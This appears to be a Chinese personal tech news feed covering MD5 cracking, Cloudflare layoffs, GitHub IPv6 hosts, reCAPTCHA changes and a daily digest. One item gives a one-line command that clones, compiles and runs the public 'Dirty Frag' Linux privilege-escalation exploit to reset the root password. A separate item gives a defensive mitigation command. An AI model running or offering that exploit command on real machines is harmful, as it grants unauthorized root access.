OKHK 👀
个人数字泔水\(◔‿◔)
✨ Thinking...
✨ Thinking...
-
- 六成 MD5 密码能在一小时内破解
#加密技术
卡巴斯基研究人员发现,如果你有一块英伟达 RTX 5090 显卡,那么六成 MD5 哈希密码可在一小时内破解,48% 的密码甚至能在一分钟内破解。如果泄露的密码使用的是 MD5 之类的哈希算法,那么密码基本可以认为被暴露了。研究人员分析了逾 2 亿个泄露的密码,发现攻击者可利用常见模式优化破解算法,显著缩短猜测密码字符组合的时间。研究人员称破解速度加快主要归功于 GPU,GPU 的性能一直在进步,但密码的安全性则没什么变化。
https://www.theregister.com/security/2026/05/07/60-of-md5-password-hashes-are-crackable-in-under-an-hour/5234954 - 在 V2 也能看到经典 localhost 地址啊 🤣
- Hexo 维护者误将 Hexo repo 设置为 private;现已恢复。
Watcher 和 Stargazer 均已丢失;订户如果想的话可以重新 watch/star。
gh:hexojs#5775
[感谢宝硕提供此消息。]
#Hexo - 这太尴尬了。
附件 A - 2025 年 9 月 - “助力构建未来” - Cloudflare 招聘 1111 名实习生“助力构建未来” [ https://blog.cloudflare.com/cloudflare-1111-intern-program/ ]
附件 B - 2026 年 5 月 - “面向未来” - Cloudflare 裁员 1100 人,约占其员工总数的 20%,以“继续构建未来” [ https://blog.cloudflare.com/building-for-the-future/ ]
最后,我想引用尤吉·贝拉的一句话:“未来已非昔日模样。”
https://news.ycombinator.com/item?id=48054423 -
- #Linux root 密码重置大法 🤣(
信创机器不给 root 密码的有救了git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && chmod +x ./exp && ./exp passwd root -
- 浏览器中的 Web 视频剪辑工具,本地处理无需上传云端,CapCut 的开源替代
https://github.com/Augani/openreel-video
#Video #Tool #GitHub - 浏阳烟花车间爆炸事故已致37死51伤(其中重症5人,生命体征平稳),另有1人失联。现场搜救工作已基本结束。
(新华社) - GitHub IPv6 访问
https://www.nodeseek.com/post-531425-12a01:4f8:c010:d56::2 github.com 2a01:4f8:c010:d56::3 api.github.com 2a01:4f8:c010:d56::4 codeload.github.com 2a01:4f8:c010:d56::6 ghcr.io 2a01:4f8:c010:d56::7 pkg.github.com npm.pkg.github.com maven.pkg.github.com nuget.pkg.github.com rubygems.pkg.github.com 2a01:4f8:c010:d56::8 uploads.github.com 2606:50c0:8000::133 objects.githubusercontent.com www.objects.githubusercontent.com release-assets.githubusercontent.com gist.githubusercontent.com repository-images.githubusercontent.com camo.githubusercontent.com private-user-images.githubusercontent.com avatars0.githubusercontent.com avatars1.githubusercontent.com avatars2.githubusercontent.com avatars3.githubusercontent.com cloud.githubusercontent.com desktop.githubusercontent.com support.github.com 2606:50c0:8000::154 support-assets.githubassets.com github.githubassets.com opengraph.githubassets.com github-registry-files.githubusercontent.com github-cloud.githubusercontent.com -
- 一觉醒来发生了什么 05 月 08 日
#Daily
2026 年 5 月 8 日
🌍 资讯快读
1、中国红十字系统 2025 年调拨救灾款物超 4 亿元
https://www.jiemian.com/article/14394080.html
2、TikTok 获批泰国 250 亿美元数据中心扩建计划
https://www.jiemian.com/article/14391708.html
3、八部门发文改革完善儿童用药供应保障,破解儿童用药难
https://www.jiemian.com/article/14394329.html
4、30 年前捐赠书画部分去向不明?天津美院回应
https://www.jiemian.com/article/14393173.html
👬 即刻镇小报
1、字最少,文案劲最大
https://m.okjike.com/originalPosts/69f57a42c2dc8bf83fd35ac5
2、看完刷手机的欲望彻底消失了
https://m.okjike.com/originalPosts/69f74dc0b955e4c0a2b93860
3、Vibe Coding 是一种无限游戏
https://m.okjike.com/originalPosts/69f43556af7695b4cf9fac0b
4、南极洛,想要再去一万次的地方
https://m.okjike.com/originalPosts/69f722a6af7695b4cfe527a3
今日即刻镇小报内容来自 @Zephyr. @唐夕 _JwPF @Szhans @泡泡啊泡泡 ,感谢以上即友的创作与分享。 - Dirty Frag: Universal Linux LPE
和 Copy Fail 类似,绝大多数发行版可一键提权
禁用 esp4、esp6、rxrpc 可以缓解sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"
https://dirtyfrag.io/
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/
exp: https://github.com/V4bel/dirtyfrag/blob/master/exp.c -
-
- Hands-on Modern RL - 现代强化学习实战指南
https://walkinglabs.github.io/hands-on-modern-rl
https://fxtwitter.com/sanbuphy/status/2052191088048558243 - 未来的 reCAPTCHA 验证将需要手机
#移动
如何遏制智能体给网站带来的欺骗性自动流量?Google 的下一代 reCAPTCHA 验证技术将通过二维码要求人类使用手机进行扫描操作来区分机器和人类。Google 对手机的要求是:运行 iOS v15.0-16.4 的苹果设备,需要下载专门的 reCAPTCHA app;Android 设备运行的 Google Play Services 版本必须高于 25.41.30,该版本是在 2025 年 10 月释出的。以后你可能需要比较新的手机设备才能正常浏览网站。
https://support.google.com/recaptcha/answer/16609652
https://cloud.google.com/blog/products/identity-security/introducing-google-cloud-fraud-defense-the-next-evolution-of-recaptcha/ -
- 公安部网安局5月7日通报:邢某用AI生成中国国民党主席郑丽文的数字人形象和带货文案,进行直播带货。山西大同警方以《治安管理处罚法》“招摇撞骗”一条将她行政拘留。
(公安部网安局)